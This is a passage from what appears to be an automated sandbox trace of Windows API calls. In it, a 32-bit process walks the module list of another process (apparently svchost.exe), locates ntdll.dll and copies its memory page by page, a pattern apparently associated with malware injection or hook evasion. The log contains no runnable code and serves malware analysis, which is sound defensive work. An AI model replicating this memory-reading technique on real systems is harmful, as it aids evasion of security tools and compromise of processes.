(lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0077.569] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda8039c0, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.569] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda803b50, Buffer=0x9e, BufferSize=0x21a7a28, NumberOfBytesRead=0x40 | out: Buffer=0x9e, NumberOfBytesRead=0x40) returned 0x0 [0077.569] StrRChrA (lpStart="C:\\Windows\\system32\\KERNEL32.DLL", lpEnd=0x0, wMatch=0x5c) returned="\\KERNEL32.DLL" [0077.569] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda803ec0, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.569] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda804050, Buffer=0x9e, BufferSize=0x21a7a28, NumberOfBytesRead=0x44 | out: Buffer=0x9e, NumberOfBytesRead=0x44) returned 0x0 [0077.569] StrRChrA (lpStart="C:\\Windows\\system32\\KERNELBASE.dll", lpEnd=0x0, wMatch=0x5c) returned="\\KERNELBASE.dll" [0077.570] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda805230, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.570] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda803950, Buffer=0x9e, BufferSize=0x21a7a28, NumberOfBytesRead=0x3e | out: Buffer=0x9e, NumberOfBytesRead=0x3e) returned 0x0 [0077.570] StrRChrA (lpStart="C:\\Windows\\system32\\sechost.dll", lpEnd=0x0, wMatch=0x5c) returned="\\sechost.dll" [0077.570] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda8054e0, Buffer=0x9e, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x9e, NumberOfBytesRead=0x98) returned 0x0 [0077.570] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xda805670, Buffer=0x9e, BufferSize=0x21a7a28, NumberOfBytesRead=0x3c | out: Buffer=0x9e, NumberOfBytesRead=0x3c) returned 0x0 [0077.570] StrRChrA (lpStart="C:\\Windows\\system32\\RPCRT4.dll", lpEnd=0x0, wMatch=0x5c) returned="\\RPCRT4.dll" [0077.570] lstrcmpiA (lpString1="svchost.exe", lpString2="NTDLL.DLL") returned 1 [0077.570] StrChrA (lpStart="svchost.exe", wMatch=0x2e) returned=".exe" [0077.570] lstrcmpiA (lpString1="svchost", lpString2="NTDLL.DLL") returned 1 [0077.570] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0077.570] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.570] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x26c0000 [0077.570] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee380000, Buffer=0x7ff8, BufferSize=0x26c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.570] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee381000, Buffer=0x7ff8, BufferSize=0x26c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.571] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee382000, Buffer=0x7ff8, BufferSize=0x26c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.571] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee383000, Buffer=0x7ff8, BufferSize=0x26c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.571] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee384000, Buffer=0x7ff8, BufferSize=0x26c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.571] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee385000, Buffer=0x7ff8, BufferSize=0x26c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.571] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee386000, Buffer=0x7ff8, BufferSize=0x26c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.571] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee387000, Buffer=0x7ff8, BufferSize=0x26c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.571] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee388000, Buffer=0x7ff8, BufferSize=0x26c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.571] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee389000, Buffer=0x7ff8, BufferSize=0x26c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.572] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38a000, Buffer=0x7ff8, BufferSize=0x26ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.572] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38b000, Buffer=0x7ff8, BufferSize=0x26cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.572] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38c000, Buffer=0x7ff8, BufferSize=0x26cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.572] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38d000, Buffer=0x7ff8, BufferSize=0x26cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.572] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38e000, Buffer=0x7ff8, BufferSize=0x26ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.572] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38f000, Buffer=0x7ff8, BufferSize=0x26cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.573] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee390000, Buffer=0x7ff8, BufferSize=0x26d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.573] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee391000, Buffer=0x7ff8, BufferSize=0x26d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.579] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee392000, Buffer=0x7ff8, BufferSize=0x26d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.579] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee393000, Buffer=0x7ff8, BufferSize=0x26d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.580] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee394000, Buffer=0x7ff8, BufferSize=0x26d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.580] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee395000, Buffer=0x7ff8, BufferSize=0x26d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee396000, Buffer=0x7ff8, BufferSize=0x26d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee397000, Buffer=0x7ff8, BufferSize=0x26d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee398000, Buffer=0x7ff8, BufferSize=0x26d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee399000, Buffer=0x7ff8, BufferSize=0x26d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39a000, Buffer=0x7ff8, BufferSize=0x26da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39b000, Buffer=0x7ff8, BufferSize=0x26db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39c000, Buffer=0x7ff8, BufferSize=0x26dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.582] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39d000, Buffer=0x7ff8, BufferSize=0x26dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.582] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39e000, Buffer=0x7ff8, BufferSize=0x26de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.582] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39f000, Buffer=0x7ff8, BufferSize=0x26df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.582] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a0000, Buffer=0x7ff8, BufferSize=0x26e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.582] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a1000, Buffer=0x7ff8, BufferSize=0x26e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.582] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a2000, Buffer=0x7ff8, BufferSize=0x26e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.582] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a3000, Buffer=0x7ff8, BufferSize=0x26e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a4000, Buffer=0x7ff8, BufferSize=0x26e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a5000, Buffer=0x7ff8, BufferSize=0x26e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a6000, Buffer=0x7ff8, BufferSize=0x26e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a7000, Buffer=0x7ff8, BufferSize=0x26e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a8000, Buffer=0x7ff8, BufferSize=0x26e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a9000, Buffer=0x7ff8, BufferSize=0x26e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3aa000, Buffer=0x7ff8, BufferSize=0x26ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ab000, Buffer=0x7ff8, BufferSize=0x26eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ac000, Buffer=0x7ff8, BufferSize=0x26ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ad000, Buffer=0x7ff8, BufferSize=0x26ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ae000, Buffer=0x7ff8, BufferSize=0x26ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3af000, Buffer=0x7ff8, BufferSize=0x26ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b0000, Buffer=0x7ff8, BufferSize=0x26f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b1000, Buffer=0x7ff8, BufferSize=0x26f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b2000, Buffer=0x7ff8, BufferSize=0x26f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b3000, Buffer=0x7ff8, BufferSize=0x26f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b4000, Buffer=0x7ff8, BufferSize=0x26f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b5000, Buffer=0x7ff8, BufferSize=0x26f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b6000, Buffer=0x7ff8, BufferSize=0x26f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b7000, Buffer=0x7ff8, BufferSize=0x26f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b8000, Buffer=0x7ff8, BufferSize=0x26f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b9000, Buffer=0x7ff8, BufferSize=0x26f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ba000, Buffer=0x7ff8, BufferSize=0x26fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bb000, Buffer=0x7ff8, BufferSize=0x26fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bc000, Buffer=0x7ff8, BufferSize=0x26fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bd000, Buffer=0x7ff8, BufferSize=0x26fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3be000, Buffer=0x7ff8, BufferSize=0x26fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bf000, Buffer=0x7ff8, BufferSize=0x26ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c0000, Buffer=0x7ff8, BufferSize=0x2700000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c1000, Buffer=0x7ff8, BufferSize=0x2701000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c2000, Buffer=0x7ff8, BufferSize=0x2702000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c3000, Buffer=0x7ff8, BufferSize=0x2703000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c4000, Buffer=0x7ff8, BufferSize=0x2704000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c5000, Buffer=0x7ff8, BufferSize=0x2705000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c6000, Buffer=0x7ff8, BufferSize=0x2706000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c7000, Buffer=0x7ff8, BufferSize=0x2707000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c8000, Buffer=0x7ff8, BufferSize=0x2708000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c9000, Buffer=0x7ff8, BufferSize=0x2709000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ca000, Buffer=0x7ff8, BufferSize=0x270a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cb000, Buffer=0x7ff8, BufferSize=0x270b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cc000, Buffer=0x7ff8, BufferSize=0x270c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.596] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cd000, Buffer=0x7ff8, BufferSize=0x270d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.596] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ce000, Buffer=0x7ff8, BufferSize=0x270e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.597] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cf000, Buffer=0x7ff8, BufferSize=0x270f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.597] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d0000, Buffer=0x7ff8, BufferSize=0x2710000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.597] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d1000, Buffer=0x7ff8, BufferSize=0x2711000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.597] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d2000, Buffer=0x7ff8, BufferSize=0x2712000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.597] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d3000, Buffer=0x7ff8, BufferSize=0x2713000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d4000, Buffer=0x7ff8, BufferSize=0x2714000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d5000, Buffer=0x7ff8, BufferSize=0x2715000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d6000, Buffer=0x7ff8, BufferSize=0x2716000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d7000, Buffer=0x7ff8, BufferSize=0x2717000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d8000, Buffer=0x7ff8, BufferSize=0x2718000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d9000, Buffer=0x7ff8, BufferSize=0x2719000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3da000, Buffer=0x7ff8, BufferSize=0x271a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.599] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3db000, Buffer=0x7ff8, BufferSize=0x271b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.599] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3dc000, Buffer=0x7ff8, BufferSize=0x271c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.599] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3dd000, Buffer=0x7ff8, BufferSize=0x271d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.599] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3de000, Buffer=0x7ff8, BufferSize=0x271e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.599] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3df000, Buffer=0x7ff8, BufferSize=0x271f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.600] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e0000, Buffer=0x7ff8, BufferSize=0x2720000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.600] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e1000, Buffer=0x7ff8, BufferSize=0x2721000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.600] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e2000, Buffer=0x7ff8, BufferSize=0x2722000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.600] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e3000, Buffer=0x7ff8, BufferSize=0x2723000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.600] 